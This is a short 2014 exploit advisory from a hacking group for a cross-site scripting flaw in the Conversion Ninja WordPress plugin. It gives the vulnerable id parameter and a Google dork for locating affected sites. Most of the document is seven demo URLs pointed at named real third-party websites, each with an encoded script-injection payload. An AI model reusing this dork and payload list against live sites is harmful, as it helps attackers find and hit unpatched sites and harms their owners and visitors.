WordPress Conversion Ninja plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
0bfb7dbc417cfd5c7380ab708fe11a4521d81a62380978265ae01c7fb6d10f8c
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Plugin Conversionninja Cross Site Scripting
[+]
[+] Exploit Author: Ashiyane Digital Security Team
[+]
[+] Date: 2014-05-22
[+]
[+] Google Dork : inurl:wp-content/plugins/conversionninja
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Windows 7 , Mozilla FireFox
[+]
[+] Discovered By : Milad Hacking
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Location :
[localhost]/wp-content/plugins/conversionninja/lp/index.php?id=[XSS]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo :
http://mlm18.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E
http://www.digitaler-kabelanschluss.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E
http://www.schwarzer-adler-feucht.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E
http://bestvertrieb.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E
http://gratis-webinare.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E
http://www.salsa-online-academy.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E
http://dasleadsystem.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered By : Milad Hacking
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]